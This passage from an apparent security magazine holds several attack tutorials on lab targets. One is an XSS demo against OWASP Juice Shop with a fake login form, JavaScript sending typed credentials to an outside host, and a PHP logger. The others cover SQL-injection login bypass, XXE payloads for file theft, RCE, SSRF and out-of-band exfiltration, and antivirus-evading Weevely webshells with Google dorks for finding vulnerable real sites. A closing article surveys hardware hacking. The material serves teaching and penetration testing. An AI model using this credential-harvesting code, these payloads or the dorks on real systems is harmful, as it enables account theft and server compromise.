HTML input fields usually have a type and name attribute. The type indicates what kind of input you expect from the
user. Is it a text, an email, a password, …? The name attribute is a reference for the server-code to grab the contents of
54
Helping customers understand the risks of Cross-Site Scripting attacks through a demo
the input. Beside these two attributes, we will add another one called placeholder. The placeholder is a text that can
help the user know what to type. As we did previously, to add attributes to an element, we will use the setAttribute
method of the created input element. The type of the username input is text:
userInput.setAttribute("type", "text");
userInput.setAttribute("name", "user");
userInput.setAttribute("placeholder", "username");
Once we have our input created with all its attributes in place, let’s style it a little. Change the display property to
block:
userInput.style.display = "block";
so that our element will be in its own line. Next, set the width to 100%:
userInput.style.width = "100%";
Let’s make the font a little bit bigger to improve its legibility:
passInput.style.fontSize = "1.3em";
and add some padding (inner margin) to have a space between the text and the input field border:
passInput.style.padding = "4px";
userInput.style.textAlign = "center";
55
Helping customers understand the risks of Cross-Site Scripting attacks through a demo
Now that we have created the input element for the username, the input element for the password is exactly the same.
The only difference is that the value of the type attribute will be password instead of text. As it is the same, I will just
paste the code:
passInput.setAttribute("type", "password");
passInput.setAttribute("name", "pass");
passInput.setAttribute("placeholder", "password");
passInput.style.display = "block";
passInput.style.width = "100%";
passInput.style.fontSize = "1.3em";
passInput.style.padding = "4px";
passInput.style.textAlign = "center";
56
Helping customers understand the risks of Cross-Site Scripting attacks through a demo
To complete our form, let’s add a submit button. The submit button is just another type of input element we can add to
a form. We create it as usual:
submitButton.setAttribute("type", "submit");
submitButton.setAttribute("display", "block");
and then, you can set the value attribute of the input to display text inside the button. In this case, the submit button
will display the word Verify:
submitButton.setAttribute("value", "Verify");
After setting the attributes of the submit button, let’s style it just as we did with the other input elements:
submitButton.style.display = "block";
submitButton.style.width = "100%";
submitButton.style.fontSize = "1.3em";
57
Helping customers understand the risks of Cross-Site Scripting attacks through a demo
submitButton.style.padding = "4px";
Now that the header and the input elements are created, append them to the form:
form.appendChild(formTitle);
form.appendChild(userInput);
form.appendChild(passInput);
form.appendChild(submitButton);
div.appendChild(form);
We are done coding the form. The last thing we have to do is code the functionality of sending the credentials back to
our server once the user clicks the submit button. But, before doing that, let’s see the form. Go to the OWASP Juice
Shop application and use the script tags to load our script just like we did before:
<script src="https://h9demoxss-h9articlexss483243.codeanyapp.com/h9demo.js"></script>
58
Helping customers understand the risks of Cross-Site Scripting attacks through a demo
Right now, the form does nothing. Let’s add the functionality to submit code using JavaScript code. But first, let’s code
the PHP file that will save the credentials in the form that will be sent. To do so, let’s go to Codeanywhere (our server)
and create a new file:
In this case, I named the file credentials.php and click the OK link:
59
Helping customers understand the risks of Cross-Site Scripting attacks through a demo
In the file, let’s start using the error_reporting function to prevent PHP from showing any errors:
error_reporting(0);
Next let’s define a variable called $user to store the value of the username. As you notice, in the PHP language,
variables start with a dollar ($) sign. The username value will be passed to us as a parameter in the query string of the
URL. To access the parameters passed in the URL, we can use the $_GET. The $_GET variable holds all the
parameters and the values passed in the query string of the URL. The query string is the part that comes after the
query (?) symbol and is composed of key value pairs separated by an ampersand (&) sign like this:
?parameter0=value0¶meter1=value1¶meter2=value2
$_GET["parameter"]
$user = $_GET["user"];
$pass = $_GET["pass"];
Now that we have retrieved the username and password from the URL, let’s save them into a file that I called
credentials.txt. To do so, let’s open the file using the fopen function. There are multiple modes to open a file to work
with it. In this case, we will open the file with the mode a+, which means the following:
60
Helping customers understand the risks of Cross-Site Scripting attacks through a demo
Now let’s write the username and password to this file. To do so, we use the fwrite function. We need to pass the fwrite
function a reference to the file, in our case the $file variable, and then the content we want to name. The dot symbol
concatenates (joins) strings and \n means to insert a newline:
Once we finish working with the file, we should close it to be sure the changes are saved correctly to the credentials.txt
file:
fclose($file);
Save the file and let’s try it out. Right click on the file and select Preview:
61
Helping customers understand the risks of Cross-Site Scripting attacks through a demo
But now, if we add the user and pass parameters in the query string and press Enter:
Even though it seems nothing happened, if we go back to Codeanywhere, we will be able to see a new file called
credentials.txt that contains the values passed in the query string for the user and pass parameters:
Now that we have tested our credentials.php file and see that it works, let’s code the functionality of the form so that,
when the user clicks the Verify button, the username and password will be sent to this URL. In Codeanywhere open
the JavaScript file. First, we are going to add what is called an event handler. An event handler allows us to respond to
different events that can happen in a web page. In our case, we are interested in the form submission. To add an event
handler, we use the addEventListener method, passing as an argument the name of the event we want to handle
(submit in our case) and then a function with code we want to execute each time the event happens. The code looks
like this:
function(event){}
event => {}
Inside the curly braces goes the JavaScript code that will be executed when the form is submitted. The first thing we
want to do is to prevent the default behavior of the submit event. Each time we submit a form, by default, the browser
redirects the user to the URL that figures in the action attribute of the form. However, in this case, we do not want the
62
Helping customers understand the risks of Cross-Site Scripting attacks through a demo
user to get redirected to our server, we want the user to stay. To prevent this default behavior, we use the
preventDefault method of the submit event:
event.preventDefault();
Next, let’s send the credentials to our server URL. To do so, we will use the fetch function. First let’s copy the URL
where we want to send the username and the password of the user:
`http://h9demoxss-h9articlexss483243.codeanyapp.com/credentials.php?user=testuser&pass=
testpass`
`https://h9demoxss-h9articlexss483243.codeanyapp.com/credentials.php?user=testuser&pass
=testpass`
Instead of using quotes (‘) or double quotes (“), we will use the ` symbol for our string because the ` symbol allows us
to include variables within the string. It is a feature of JavaScript called template literals and allow us to specify any
variable inside of any curly braces followed by a dollar sign ${}. So, as we want the value of the user and pass, we will
change the URL from this:
`https://h9demoxss-h9articlexss483243.codeanyapp.com/credentials.php?user=testuser&pass
=testpass`
To this:
`https://h9demoxss-h9articlexss483243.codeanyapp.com/credentials.php?user=${userInput.v
alue}&pass=${passInput.value}`
Therefore, each time someone clicks on the submit (Verify) button, the username and password typed in the form will
be included in the URL. Also, for the purpose of this demo and to avoid problems with CORS (Cross-Origin Resource
Sharing), besides the URL as a first argument to the fetch function, we will pass a second argument setting the mode
property of the request to have the value no-cors. The code will look like:
63
Helping customers understand the risks of Cross-Site Scripting attacks through a demo
fetch(
`https://h9demoxss-h9articlexss483243.codeanyapp.com/credentials.php?user=${userInput.v
alue}&pass=${passInput.value}`,
{mode: "no-cors"}
);
Finally, we hide the div to let the user keep using the OWASP Juice Shop application:
div.style.display = "none";
Save the file. Go to the OWASP Juice Shop application and use the script tags to load our script just like we did before:
<script src="https://h9demoxss-h9articlexss483243.codeanyapp.com/h9demo.js"></script>
The form will appear as before but now, if we enter any credentials on the form and click the Verify button:
64
Helping customers understand the risks of Cross-Site Scripting attacks through a demo
And if we go to Codeanywhere, we will be able to see that the credentials entered by the user have been saved in the
credentials.txt file:
Congratulations. Thank you for reading the article to the end. As I shared before, this attack can be delivered by just
sharing the following link through a phishing email, through a website or just leaving a note in the comment section:
https://h9demoxss-juice-shop.herokuapp.com/#/search?q=<script+src="https://h9demoxss-h9
articlexss483243.codeanyapp.com/h9demo.js"></script>
Even though it is outside of the scope of this article, there are many techniques that will allow us to hide the link such
as the following one:
<a href=’https://h9demoxss-juice-shop.herokuapp.com/#/search?q=<script+src="https://
h9demoxss-h9articlexss483243.codeanyapp.com/h9demo.js"></script>’>Google</a>
Closing
Many thanks for the time you have spent reading the article. For more information and source code visit my Github
page: https://github.com/epasan/h9demoxss
65
Helping customers understand the risks of Cross-Site Scripting attacks through a demo
References
Talks:
Books:
Websites:
• History API
• Request.Mode
Free resources:
66
Helping customers understand the risks of Cross-Site Scripting attacks through a demo
References
• Google XSS-Game
A series of challenges to learn how to perform cross-site scripting attacks
Paid resources:
• Pentester Academy
It is one of the best resources available for learning anything you want about cybersecurity. It
has three great courses that can help you get started:
• WAP Challenges
67
Web App Hacking
Examples
Hamdi Sevben
ABOUT THE AUTHOR
Hamdi SEVBEN
Hamdi SEVBEN is a master student of cyber security in computer science at the Gebze
Technical University. He received his bachelor's degree in computer science from the
He has worked in defensive side in the cyber security in a private company for 6 years
from 2013 to 2019. Especially, he is conducting research ethical hacking, web app
testings.
Also he has CEH V10 of Ec-Council, CPEH and CPTE of Mile2 certificates in the cyber
security.
Next target he has is OSCP exam which takes 23 hours and 45 minutes, and OSCE
69
Web App Hacking Examples
We'll skip the theoretical parts and make scenarios of examples of web attacks. As it is forbidden to attack any site
owner without written consent, we can make attacks on https://juice-shop.herokuapp.com/#/. This platform
has already been designed by Owasp for testing purposes.
At first we should always look at the source code of the web page. When I check, I can't find anything important for
this web page. Then we can open and check the page in debugger mode, and we usually use developer tools with
Firefox, like these tests:
Let's open it in debugger mode and check the main -es2015.js JavaScript page. It is not in readable format, and we
could use JavaScript beautifier for it. When analyzing JavaScript codes, the "administration" path draws the attention:
70
Web App Hacking Examples
When we try to go to the "administration" path, it will give 403 code, which refers to being forbidden.
We can go to the login panel and try the default usernames and passwords, like admin:admin, manually or giving a
dictionary list, or test whether it's open, like SQL injection.
71
Web App Hacking Examples
In this panel, we can try authentication bypass techniques with Burp Suite. We need to go to
"https://github.com/swisskyrepo/PayloadsAllTheThings" to try it. After cloning it with git clone, let's check
the Auth_Bypass.txt and Auth_Bypass2.txt ready word lists in the SQL Injection/Intruder directory. It will take
much time to try many possibilities one by one, and since there will be a lot of possibilities, we may miss some
significant points; it is easier to give this list to the Burp Suite intruder, it will be much faster and easier than manually
scanning on our own.
72
Web App Hacking Examples
Then we enable the Firefox foxyproxy add-on so that we can sniff the traffic by placing the Burp Suite between Firefox
and the web server. You can also set browser proxy mode from the long path of the Edit-Preferences-Network
Proxy-Settings-Manual proxy configuration whenever necessary. While it is possible to activate it with a single
click, is it still necessary? The decision is yours.
After that, we continue trying to login with admin:admin credentials, and capture them on the intercept section on
Burp.
73
Web App Hacking Examples
Afterwards, sending them to intruder with the right click is required to assign the related payloads.
When it comes to the intruder tab, firstly there are five payloads. But all the others are not required except email and
password.
Before moving to the Payloads tab, we first need to clear three payloads with Clear.
74
Web App Hacking Examples
To set payload options we can assign the payloads, like Auth_Bypass/2.txt, which we have cloned from GitHub or we
could have downloaded or created.
Also you can use Fuzzing – SQL injection on Add from list … if your version of Burp is pro.
75
Web App Hacking Examples
You will see as follows when they are loaded that there are a bunch of payloads we may not remember and take into
account.
While scanning from top to bottom, the titles of Status and Length especially catch our attention.
76
Web App Hacking Examples
First we need to look at the changing parts of the Status and Lengths. When we control the first row, 401 code means
unauthorized. You will already see an invalid email or password answer in the response section.
On the second row, 500 code stands for internal server error and in the response part, it leaks the kind of dbms as
sqlite, which is so risky.
77
Web App Hacking Examples
If we classify according to Status tab, the rows will be ordered as follows. Finally, we see bajillions of 200 OK success
code, which is already seen with authentication.
Here the token value draws our attention. It looks like base64. Let’s try to decode on
https://codebeautify.org/base64-decode.
78
Web App Hacking Examples
79
Web App Hacking Examples
On the login panel, typing ‘ or 1=1-- or [email protected] to email section and entering anything or admin123 to
password part, we see we will log in.
We can click account and your basket, we can even visit profile page.
And that’s all! Hope you enjoyed those examples! Remember, hacking is a skill that constantly needs to be practiced.
80
XML External
Entities (XXE)
by Angelo Anatrella
ABOUT THE AUTHOR
Angelo Anatrella
since I was a child. I have more than five years of work experience in
Professional).
https://www.linkedin.com/in/angelo-anatrella-67719a53/
82
XML External Entities (XXE)
Contents
1. Introduction
4. Mitigations
1. Introduction
The technology's development and the World Wide Web confirmation has undoubtedly improved the quality of life,
allowing to break down the barriers of time and space, both in the family and in the commercial sphere.
However, the increasing technology has simultaneously exposed the privacy of each individual, his image and his
personal data, to new forms of aggression; let us remember fraud, computer viruses, the holding of access credentials
or in general non-own identification codes and all those behaviors that result in illegal forms of interference on the
telematic and IT activities of other people.
The diffusion of Web Applications, through which to provide value-added services accessible through different
channels, has brought on the one hand innumerable benefits to the end user (purchase of goods and services, distance
learning, etc.) but on the other hand has produced new ones, such as dangerous security issues.
Web Applications continuously interact with users, receiving data that is first processed and then supplied to the
underlying technologies.
A web application generally offers various features, each of which can be defined as correct when, given an input
provided by the user, which satisfies the "preconditions" established by the developer, there is an output that respects
the "postconditions" established by the same.
The preconditions specify any definition restrictions on the set of input data, while the postconditions specify the
outputs.
If an input is set and one of the preconditions is not satisfied, it is still necessary to manage that eventuality in order to
avoid the Web Application behaving in an unpredictable way in its elaboration.
The data processing phase should necessarily provide an input validation to verify if it is good and should implement a
possible sanitization by intentionally malicious code included with the aim of altering the normal behavior of the web
application.
83
XML External Entities (XXE)
The major complexity of the applications make the task of validating and filtering the user's input a problem that’s
really difficult to solve. We should also think that a user could encode the input in multiple ways to avoid the filtering
strategy of the developer.
In this article, we will examine a web attack that is still little known, despite the fact that it is in fourth place within the
OWASP top ten 2017. This attack exploits a weakness in the user's input processing phase when the web application
accepts as input an XML document.
After examining the basic structure of an XML, we will analyze the following two scenarios:
XML (Extensible Markup Language) is a markup language used to define a syntax for document encoding. It does that
through the use of tags that define the structure of the document, as well as how the document should be stored and
transported. The XML 1.0 standard defines the structure in detail.
<?xml version="1.0"?>
<papers>
<paper>
<author>Angelo Anatrella</author>
<title>XML External Entity </title>
<publisher>Hakin9</publisher>
</paper>
</papers>
To verify the validity and congruity of the document, it is recommended, although not mandatory, to use the DTD
(Document Type Definition) that contains the tag definition rules, indicates the lawful elements, the structure, the
quantity and their order into the XML document. So the DTD defines the grammar of the document.
The XML 1.0 standard also defines a concept called entity, which is nothing more than a storage unit of a certain type.
An entity is used to define abbreviations commonly used in the document, to divide the document into several parts or
to divide the DTD into several parts and make it modular.
84
XML External Entities (XXE)
Or could be external when the value is referenced by a URI (Uniform Resource Identifier):
If a web application accepts an XML input, an element called “parser” will be required to perform the syntactic
analysis of the XML.
The XXE XML (External Entity) in-band vulnerability exploits the weakness in the XML parser configuration. The
attack occurs when the XML input, if it contains a reference to an "external entity", is processed by an XML parser
configured in an untrusted way.
So, if the web application accepts as input an XML document and the parser is not properly configured, an attacker
could forge a malicious XML, referencing an "external entity" that could allow him to steal sensitive data from the
server's filesystem.
In some less frequent cases, exploiting the same vulnerability, it is also possible to perform remote command
execution or a denial of service attack.
Referencing Figure 1, the steps to perform the XXE in band attack are:
85
XML External Entities (XXE)
2) The XML parser processes the XML submitted with the reference to a specific file on the vulnerable server’s
filesystem;
To practice with the techniques shown in the article, using OWASP Mutillidae 2 Project is recommended, a vulnerable
open source web application that can be used in general as target for the study of the OWASP top ten vulnerabilities
and try to learn with a practice approach.
To test the XXE, it’s possible to use the XML Validator accessible via the Mutillidae web application menu (OWASP
2017 –> A4-XML External Entities –> XML External Entity Injection –> XML Validator).
XML Submitted
The XML is validated and its content is parsed. Now let's try to understand the use of entities:
XML Submitted
If we define an entity “word” and we recall it with &word, the parser will print its value in the output:
86
XML External Entities (XXE)
Hello World
It seems harmless but an attacker could exploit the entities to overload the parser's memory and cause a denial of
service by using entities inside other entities, like a matryoshka.
XML Submitted
Hello World World World World World World World World World
World World World World World World World World World World
World World World World World World World World World World
World World World
For this reason some default parsers limit the memory usage they can use.
Now let's try to access files. Let's start from the robots.txt file contained in the root directory of the web application.
XML Submitted
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "robots.txt">]><foo>&xxe;</foo>
The XXE payload submitted defines an external entity &xxe and this value is the content of the robots.txt file, which in
this example will be shown on screen:
Here we are - now that we understand how it works, we can try to forge an XML to access more interesting files on the
filesystem:
87
XML External Entities (XXE)
XML Submitted
In the case above, the XXE payload submitted defines an external entity with the content of the /etc/passwd file as
value:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
ync:x:4:65534:sync:/bin:/bin/sync
(...)
In particularly interesting cases it is easy to exploit an RCE (remote command execution) from an XXE attack. In the
example shown below, we exploit the "expect" PHP module:
XML Input
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "expect://id" >]>
<creds>
<user>&xxe;</user>
<pass>mypass</pass>
</creds>
Another important impact of the XXE attack to consider is the possibility of exploiting it to perform a server-side
request forgery (SSRF) attack. In this case, an attacker induces the server side application to make an HTTP request to
every URL that the server has access. To perform an attack of this type, it is necessary to define an XML entity with a
target URL. You can use this attack to get return values or just to perform blind SSRF.
In the example below, an XML is shown to make an HTTP request to a certain host at the specified port:
XML Input
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://nomehost:port/"
>]><foo>&xxe;</foo>
88
XML External Entities (XXE)
An attacker could use this attack to access, for example, systems inside a network protected by a firewall and normally
not accessible from the outside.
The cases analyzed so far are examples of in-band XXE; they are the most common in which an attacker receives a
response following the sending of the malicious payload. There are examples of XXE blinds, defined as OOB
(out-of-band), in which an immediate response from the web application is not returned.
The exploitation way of an XXE OOB requires that the XML parser make a request to an external server under the
attacker's control. This is necessary to allow the attacker to steal sensitive data on the vulnerable server.
The attack involves the definition of an external DTD, which will reside on the attacker's server and the use of the
parameter entities used to define abbreviations to be used within a DTD. A parameter entity begins with the character
%.
XML Input
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE data [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://hostAttacker:port/
evil.dtd">%dtd;]>
<data>&send;</data>
DTD
<!ENTITY % all "<!ENTITY send SYSTEM http://
hostAttacker:port/?collect=%file;'>">
%all;
89
XML External Entities (XXE)
1. The XML parser processes the parameter entity %file, which will load the file /etc/passwd.
2. The XML parser makes an HTTP request to get the DTD exposed by the attacker's server to the address
http://hostAttacker:port/evil.dtd and then will process the DTD.
3. The parameter entity %all will create a general entity "send" which will contain a URL. this URL will
contain the etc/passwd file content http://hostAttacker:port/?collect=
root:!:0:0::/:/usr/bin/(…)
4. The XML parser will process the send entity and will make an HTTP request to the attacker's server. The
attacker will have access to steal data content by the server's logs analysis.
5. Mitigations
Very often, the libraries used for the parsing of XML support features that are not strictly necessary for the use of the
web application should be disabled as well as all that is not strictly necessary by consulting the documentation of the
library in use, such as the resolution of external entities and the use of DTDs.
For further details, refer to the XXE Prevention Cheat Sheet by OWASP.
Conclusions
It is evident that with time the attack techniques are increasingly refined and are difficult to identify without constant
attention to the problem and continuous learning.
90
XML External Entities (XXE)
Security does not have to appear as a static object but as a process in continuous evolution, which starts from the
definition of some basic rules and gradually refines itself over time, countering the existing new threats.
It is necessary that everyone, without distinction, actively collaborate to defend data and information; on the one
hand, designers and developers need to avoid the presence of leaks and observe and support the effective
improvement of security management rules, on the other hand, users should be cautious and inquire to be able to
better face the risks of the WEB.
Bibliography:
• https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
• https://www.owasp.org/index.php/Top_10-2017_A4-XML_External_Entities_(XX
E)
• https://www.owasp.org/index.php/OWASP_Mutillidae_2_Project
• https://portswigger.net/web-security/xxe
• https://portswigger.net/web-security/xxe#exploiting-xxe-to-perform-ssrf-attac
ks
• https://www.acunetix.com/blog/articles/xml-external-entity-xxe-vulnerabilities/
• https://www.acunetix.com/blog/articles/server-side-request-forgery-vulnerabili
ty/
• https://www.acunetix.com/blog/articles/band-xml-external-entity-oob-xxe/
• https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Preventi
on_Cheat_Sheet.html
91
Undetectable
Webshells on
Penetration Tests
Engagements
Hubert Demercado
Elzer Pineda
ABOUT THE AUTHOR
Hubert demercado
penetration testing both the public and private sectors, specialized design of
93
ABOUT THE AUTHOR
Elzer Pineda
94
Undetectable Webshells on Penetration Tests Engagements
In several digital intrusion tests, our team has managed to identify servers that allow you to upload files and take
control of them. Now there are two security controls to be defeated: 1. Antivirus and 2. intrusion prevention systems.
Both can eliminate the probability of success of compromising our target.
In this article, we will explore one of the techniques that allow us to increase the probability of success on obtaining a
remote shell. The goal is to totally compromise the server by placing obfuscated code that allows us to bypass antivirus
detection.
So head up to your Kali distro terminal and let’s start on the creation of a web shell that most of the antivirus programs
can't detect. For the shell, we will be using Weevely.
Weevely allows us to create web shell code with many post-exploitation possibilities to scale privileges and pivot to
internal networks.
First step: generate our shell for the server with Weevely with the following command:
Weevely will ask you for a password that will protect our new generated shell.
Note: The latest version of Kali Linux comes with Weevely pre-installed.
So the previous command generated PHP code that is obfuscated. Let’s see what is inside the new shell:
95
Undetectable Webshells on Penetration Tests Engagements
Did you notice that the antivirus didn’t catch the shell? This type of webshell allows attackers to compromise servers
and perform remote control over them.
Second step: find a target; for that we will be exploiting DVWA, a vulnerable web application.
96
Undetectable Webshells on Penetration Tests Engagements
Note: web applications place filters on file types that are allowed on the server to prevent attackers from uploading
malware. In DVWA, filters are used so that only images can be uploaded (you have to bypass that).
With Weevely, we have an encoded shell protected by a password. We can use the help command to know all the
commands that we could use on our penetration test assessments.
Once you have uploaded the shell on the server (DVWA), you can access it by providing the URL path to Weevely and
the password that you have generated, as shown in the following image:
The exploits within the server allow us to access critical files including: /etc/passwd, /etc/shadow, download
post-exploitation tools, and so on.
97
Undetectable Webshells on Penetration Tests Engagements
Step three: through Google dorks (a search string that uses advanced search operators to find information that is
not readily available on a website) we can find vulnerable websites (please have pre-authorization, you are the good
guy) that allow us to upload shells. These are some examples of those dorks:
Dork to find vulnerable WordPress plugins that allow you to upload files.
inurl:''/wp-content/plugins/wp-ajax-form-pro/''.
inurl:''/wp-content/plugins/chenpress/''
98
Undetectable Webshells on Penetration Tests Engagements
Through these dorks, you can find vulnerable sites that allow you to upload undetectable webshells like the one we
have generated, allowing control and access to the compromised server as detailed in previous points.
www.centauritech.com
99
Hardware
Hacking
Felipe Hifram
Deivison Franco
Leandro Trindade
ABOUT THE AUTHOR
Felipe Hifram
101
ABOUT THE AUTHOR
Deivison Franco
Sciences (SBCF). C|EH, C|HFI, DSFE and ISO 27002 Senior Manager. Author and
102
ABOUT THE AUTHOR
Leandro Trindade
103
Hardware Hacking
Hardware security is not traditional cybersecurity, but a fusion of cybersecurity with other engineering disciplines, like
embedded computing and electronics. So, it addresses much more than mere data, servers, network infrastructure and
information security. Rather, it includes the direct or distributed monitoring and/or control of the state of physical
systems connected or not over the Internet.
In other words, a large element of what distinguishes the hardware security from cybersecurity is what many industry
practitioners today refer to as cyberphysical systems. Cybersecurity, if you like that term at all, generally does not
address the physical and security aspects of the hardware device or the physical world interactions it can have.
Digital control of physical processes over networks makes the hardware devices unique in that the security equation is
not limited to basic information assurance principles of confidentiality, integrity, non-repudiation and so on, but also
that of physical resources and machines that originate and receive that information in the physical world. Therefore,
hardware devices have very real analog and physical elements, just because they are physical things. So, the
compromise of such devices may lead to physical harm of persons and property, even death.
Also, with physical devices, attackers have more options when it comes to attacking devices and it should be noted that
breaking a specific device may not be the ultimate goal. As intruders over the Internet, we have only exposed network
services for "educational purposes". But when testing a physical device, the attack surface can be much larger,
including network services, radio frequency input/output, chip debugging, exposed serial ports, memory extraction,
and so on.
In addition, after breaching the security of a physical device, it is possible to use discovered vulnerabilities (or
extracted access keys) to compromise other devices, and this is the main purpose.
Separating each device for root access is not feasible, but compromising one device and using its information to
compromise other devices is much more efficient for an attacker.
Introduction
The word "hacking" in terms of hardware is often misused. In the commonly accepted definition, "hardware hacking"
means modifying an existing piece of electronics to use it in a way that was not necessarily intended. Even this
definition is vague, as it can refer to any method of hardware modification, be it in the cabinet, electronics, or
behavior.
Modifying a case from a device is usually simple; drill a hole, cut a slot, etc. But hacking into electronics and/or
behavior is a tricky business in itself. When trying to modify a device, it is sometimes difficult to know where to begin
and what angle of attack to take when breaking into something with a purpose for which it was not designed.
If you want to break into a piece of hardware, the way you approach it depends on what you are trying to do. Are you
trying to make it wireless? Are you trying to change what is displayed? Are you trying to get it to trigger another
104
Hardware Hacking
device? Each intrusion requires a different angle of attack and it is difficult to decide how to proceed if you have never
invaded a device before.
Following are some common hardware intrusion methods and the implementations in which they are used. This is by
no means a "how to hack hardware" tutorial. This article could not exist completely. The nature of hacking insists that
there is always a new creative way to solve it, but these are some common methods I've used in my experiments.
Methods
Input/Output Patching
The first (and arguably the easiest) method of breaking into a device is to patch its control mechanism. Most consumer
products have at least one button or indicator LED, and connections to this component are usually easy to find and
solder.
With button access, you can connect your own button, relay or transistor circuit to control it with your own hardware.
For example, if you want to make a wireless device, you can connect it directly to the buttons to direct the signal to the
high or low button, depending on what the wireless device receives. I see this kind of implementation all the time.
There is an article on hackaday, for example, about a user named Kolumkilli breaking into his Keurig coffee maker to
be wirelessly controlled. He accomplished this by locating the "brew" buttons and plugging in a wireless device (Figure
1). This type of intrusion can be performed without delving into the actual programming of the device.
With access to the LED pads on a device, for example, you have a reliable device output source. The best example we
have ever seen of this is a trick with the Star Wars Force Trainer (Figure 2).
1 https://hackaday.com/2013/11/12/wireless-keurig-hack/
105
Hardware Hacking
In the hack the designers simply soldered the LEDs to the base of the toy to power their own device when certain LEDs
were lit. Then they could use the toy as a controller of their own system without having to access the data on the
device.
Component Replacement
This method is often used in circuit bending. You want the device to look different, so it replaces a component (usually
experimentally) to get a different sound from a device. This type of approach is not relegated to circuit bending,
however.
Many interesting hacks have been achieved by replacing a component. For example, replacing bicycle lamps with high
intensity LEDs (Figure 3) or replacing the motor in a toy car to make it faster (Figure 4).
2 https://hackaday.com/2015/02/22/use-the-force-luketo-turn-off-your-tv/
3 http://hackedgadgets.com/2006/10/05/antique-bike-light-led-mod/
106
Hardware Hacking
Logic Analyzer
You can gather a lot of "private" data from a device using a simple logic analyzer. To do this, simply find a chip or test
point on a circuit board, connect a logic analyzer, and then run the device.
The logic analyzer will record any signals that occur on the lines it sniffs, and this data can potentially be translated
into something useful.
Once we hacked a Saleae rangefinder (Figure 5) this way, probing its serial lines while it was running. For this, we use
Saleae Logic Analyzer (Figure 6), which automatically detects the baud rate and translates signals to the SPI, I2C and
serial protocols. Therefore it is a vital tool in a hardware hacking toolkit.
4 https://www.youtube.com/watch?v=WkD82ZjcRIY
5 https://www.sparkfun.com/products/13196
107
Hardware Hacking
When an electronic device is manufactured, it must be programmed with firmware at some point. Therefore, the same
port through which a device is programmed can also be used to unmount and hack the firmware.
Many microcontrollers have a memory dump feature that can be triggered through their programming port that allows
the user to read the full memory (in hex) of the chip.
In this scenario, many devices include a feature that "locks" the device so that it cannot be read or reprogrammed after
the upgrade. However, many device manufacturers do not implement this feature, leaving their products susceptible
to firmware intrusions. This requires the following steps:
1. Identify the device and if it has the ability to dump its memory;
2. Build or buy a programmer that can receive this memory dump and transmit it to a computer;
5. With the assembly language, one is looking at the firmware and, from there, one can modify it as desired,
changing variables and registers to modify the behavior of the device;
6. Then recompile the firmware in hexadecimal and reprogram the device with the changed firmware.
This is an advanced method of hardware hacking, and one that can provide the most effective results.
A good example of this type of hacking is GoodFET7 - a device developed by Travis Goodspeed that serves, among
other things, to fire a hex dump and reprogram the cross-platform flash memory (MSP430, AVR and PIC, for
example), making it easy to download or view code hosted on a chip.
6 https://www.saleae.com/pt/downloads/
7 http://goodfet.sourceforge.net/
108
Hardware Hacking
Exposed Services
Exposed services on the device can be compromised and there is not much to talk about unless we consider the
vulnerabilities present in applications and infrastructure.
The vulnerability of an exposed service could be related to something as simple as outdated software or something as
complex as injection commands and code manipulation. However, it is noteworthy that a hardware attacker could
inform an application attacker, or vice versa, about a particular vulnerability encountered and thereby target the type
of related attack.
For example, a command injection vulnerability in a device's administrative interface is as critical as access to an
application's source code. In this sense, hardware hacking techniques can lead to the extraction of source code from a
device. To illustrate the example of an exposed service, Figure 7 shows exposed network services on a hardware
connectivity platform.
Hardware devices not only communicate over common communication cables or protocols, such as Wi-Fi, there are
other forms and possibilities of connectivity.
A good example to illustrate this statement was presented at a talk by security researcher Natalie Silvanovich9, in
which she talked about Tamagotchi's hacking hardware through its infrared (IR) communication.
8 https://www.digi.com/resources/documentation/digidocs/90001929/Content/Task/T_config_netservices.htm
9 https://www.youtube.com/watch?v=0JzORzMnm-E
109
Hardware Hacking
In the context of Radio Frequency (RF) hacking hardware, it is possible to find several attackable platforms such as
Bluetooth Low Energy (BLE), ZigBee and FM RDS. Thus, an attack on RF communications can be accomplished via a
software-defined radio (SDR) - radio communication system where typically hardware components (frequency mixers,
filters, amplifiers, modulators/demodulators, detectors, etc.) are implemented in software.
Thus, it is possible to see the term Universal Software Radio Peripheral (USRP) - the range of software-defined radios
designed and sold by Ettus Research, which are not necessarily robust. Figure 8 shows an Ettus USRP B200 mini of
frequency between 70MHz and 6GHz.
Chip Debugging
Hardware frequently has built-in testing mechanisms, which are commonly harnessed by attackers to compromise
devices. However, such mechanisms exist for an important reason - when manufacturing hardware, it is pertinent to
have a way to test them when they are ready, and to answer questions such as: Was the manufacturing process
successful? If a customer returns a device claiming a defect, is it possible to prove the defect? If it is defective, how was
it damaged?
On-chip interfaces that allow interaction with the system can help answer these questions and solve these problems.
However, they can also facilitate improper access and allow you to breach your security.
In this scenario, much is said about Joint Test Action Group (JTAG) - a standard for verifying and testing hardware
devices. Thus, the JTAG (IEEE 1149.x) standard does not define a connector type, but a serial protocol to interact with
chips, which can often be found internally as a set of pins positioned to one side, but can only be exposed as easily by
attaching the pins to the controller. Thus, Figure 9 shows an example of a JTAG exposed on a board as a set of
connectors.
10 https://www.ettus.com/all-products/usrp-b200mini/
110
Hardware Hacking
Serial or Universal Asynchronous Receiver/Transmitter (UART) connections are built-in connections that allow you to
verify device behavior and, in some cases, provide inputs if needed.
UART is a generic term for serial input and output, but generally refers to a connection on a device that provides
text-based output. You can often connect your device with a USB to UART and use a terminal emulator like PuTTY to
interact with the running operating system or receive debug output. Figure 10 illustrates this scenario.
Memory Extraction
Many hardware devices have storage chips from which you can extract content - which does not necessarily mean that
they will be encrypted or not. Therefore, where content is encrypted, additional work is required to extract the
encryption key. However, it is often possible to access the storage chip, interact with it to dump its contents, then
analyze the software the system runs, modify it directly, or change the access key and expose services such as
Telnet/SSH, as well as disabling firewalls such as IPTables on embedded Linux systems.
11 https://sysprogs.com/VisualKernel/tutorials/imx6/jtag/
